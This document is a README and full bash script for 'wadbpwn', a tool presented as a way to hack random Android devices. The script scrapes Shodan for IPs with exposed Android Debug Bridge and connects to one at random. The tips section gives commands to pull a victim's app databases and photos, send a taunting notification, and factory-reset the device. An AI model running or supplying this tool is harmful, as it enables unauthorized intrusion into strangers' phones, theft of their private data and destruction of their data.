Skip to content

wadbpwn

Hack random android device with 100% guarantee to succeed within 1 second.

Get Started On Linux/MacOSX

git clone https://github.com/wuseman/wadbpwn
cd wadbpwn
chmod +x wadb*
bash ./wadbpwn.sh
  • Wait ~1 second

Target has been pwned!

  • Enjoy ;-)

Get Started On Windows 10

Install any linux distro from microsoft store and run commands above..

Tips & Tricks made by wuseman

Steal all databases from the device ( require root )

which su &> /dev/null
if [[ $? -eq "0" ]]; then
   adb pull /data/data/ /some/path
else
   printf "* No root detected, just try another target..\n"
   exit 1
fi

Steal all pictures:

A simple example:

PICS="$(adb shell 'su -c find / \( -name '*.png' -name '*.jpg*' \)')"
for pictures in $PICS; do
   adb pull -p $PICS /some/folder
 done
printf "Done..is it your lucky day? ;-)\n"

Send a push notice:

adb shell am broadcast -a com.google.android.c2dm.intent.RECEIVE -n <your.app.package>/com.google.android.gms.gcm.GcmReceiver --es "You h4v3 b33n h3cked mat3" "hrhr!"

Factory reset of the device:

adb shell am broadcast -a android.intent.action.MASTER_CLEAR
adb shell reboot

Full script, wadbpwn.sh

#!/bin/bash
################################################################################
################################################################################
####                                                                       #####
#### A notice to all nerds.                                                #####
#### If you will copy developers real work it will not make you a hacker.  #####
#### Resepect all developers, we doing this because it's fun!              #####
####                                                                       #####
################################################################################
################################ SOURCE CODE ###################################
################################################################################
###################### XXXXXXX WAS FOUNDED BY WUSEMAN ##########################
################################################################################
####                                                                       #####
####  XXXXX                                                                #####
####  Copyright (C) 2018-2019, wuseman                                     #####
####                                                                       #####
####  This program is free software; you can redistribute it and/or modify #####
####  it under the terms of the GNU General Public License as published by #####
####  the Free Software Foundation; either version 2 of the License, or    #####
####  (at your option) any later version.                                  #####
####                                                                       #####
####  This program is distributed in the hope that it will be useful,      #####
####  but WITHOUT ANY WARRANTY; without even the implied warranty of       #####
####  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the        #####
####  GNU General Public License for more details.                         #####
####                                                                       #####
####  You must obey the GNU General Public License. If you will modify     #####
####  this file(s), you may extend this exception to your version          #####
####  of the file(s), but you are not obligated to do so.  If you do not   #####
####  wish to do so, delete this exception statement from your version.    #####
####  If you delete this exception statement from all source files in the  #####
####  program, then also delete it here.                                   #####
####                                                                       #####
####  Contact:                                                             #####
####          IRC: Freenode @ wuseman                                      #####
####          Mail: wuseman <wuseman@nr1.nu>                               #####
####                                                                       #####
################################################################################
################################################################################


banner() {
cat << "EOF"
                  _      ____    ____    ____                 _   _     
 __        __ U  /"\  u |  _"\U | __")uU|  _"\ u__        __ | \ |"|    
 \"\      /"/  \/ _ \/ /| | | |\|  _ \/\| |_) |/\"\      /"/<|  \| |>   Author: wuseman <wuseman@nr1.nu>
 /\ \ /\ / /\  / ___ \ U| |_| |\| |_) | |  __/  /\ \ /\ / /\U| |\  |u   Version: 1.0
U  \ V  V /  U/_/   \_\ |____/ u|____/  |_|    U  \ V  V /  U|_| \_|    
.-,_\ /\ /_,-. \\    >>  |||_  _|| \\_  ||>>_  .-,_\ /\ /_,-.||   \\,-. 
 \_)-'  '-(_/ (__)  (__)(__)_)(__) (__)(__)__)  \_)-'  '-(_/ (_")  (_/  
                                                                        
      You will succeed, whether you are a professional or a n00b.
========================================================================
EOF
}

status() {
ADBW=$(adb devices | sed -n '2p'|awk '{print $2}' | sed 's/device/normal/g')
ADBF="$(fastboot devices | grep fastboot|awk '{print $2}')"
ADBOFF="$(adb devices | sed -n 2p)"

if [[ $ADBW = "normal" ]]; then
    echo "normal" > $(pwd)/.wadbpwn-status
elif [[ $ADBW = "unauthorized" ]]; then
    echo " * Please allow this pc to authorize" > $(pwd)/.wdroid-status
elif [[ $ADBW = "recovery" ]]; then
    echo "recovery" > $(pwd)/.wdroid-status
elif [[ $ADBF = "fastboot" ]]; then
    echo "fastboot" > $(pwd)/.wdroid-status
else
echo " * No device connected.."
fi
}

mustbeinnormalmode() {
if [[ ! $(cat $(pwd)/.wdroid-status) = "normal" ]]; then
   echo "Device must be in normal mode for this feature, aborted.."
   exit 1
fi
}

requirements() {
mustbeinnormalmode
adb="$(which adb 2> /dev/null)"
distro=$(cat /etc/os-release | head -n 1 | cut -d'=' -f2 | sed 's/"//g')

if [ -z "$adb" ]; then
  read -p "Install adb (Y/n) " adbinstall
fi

case $adbinstall in
     "Y")
      sleep 1
case $distro in
     "Gentoo")
        echo -e "\nIt seems you running \e[1;32m$distro\e[0m wich is supported, installing adb...."
        emerge --ask android-tools ;;
     "Sabayon")
        echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
        emerge --ask android-tools ;;
     "Ubuntu")
        echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
        apt update -y; apt upgrade -y; apt-get install adb ;;
     "Debian")
        echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
        apt update -y; apt upgrade -y; apt-get install adb ;;
     "Raspbian")
        echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
        apt update -y; apt upgrade -y; apt-get install adb ;;
     "Mint")
        echo -e "It seems you running \e[1;32m$distro\e[0m wich is supported, installing adb....\n"
        apt update -y; apt upgrade -y; apt-get install adb ;;
     "no") echo "Aborted." ;
           exit 0 ;;
esac
       echo -e "This tool is not supported for $distro, please go compile it from source instead...\n"
esac
}

root_required() {
adb shell which su &> /dev/null; if [[ $? = "1" ]]; then echo "This option need device to be rooted, aborted..";exit 1; fi
}


TARGETS="https://www.shodan.io/search?query=android+debug+bridge"
 status
 banner
 curl -sL $TARGETS|grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b'|shuf -n 1|xargs adb connect > hacked-ip.txt
 if [[ $(cat hacked-ip.txt |awk '{print $3}' |sed 's/^/Woohha!! You have been successfully connected to: /g'; echo) = "connected" ]]; then
 printf "* Something went wrong, please try again..\n"
 else
 cat hacked-ip.txt |awk '{print $3}' |sed 's/^/Woohha!! You have been successfully connected to: /g'; echo

# Let us remove the text file and exit the program..
 rm hacked-ip.txt &> /dev/null
 echo -e "Hint: use 'adb shell' for enter the device shell..\n"
 exit 1

fi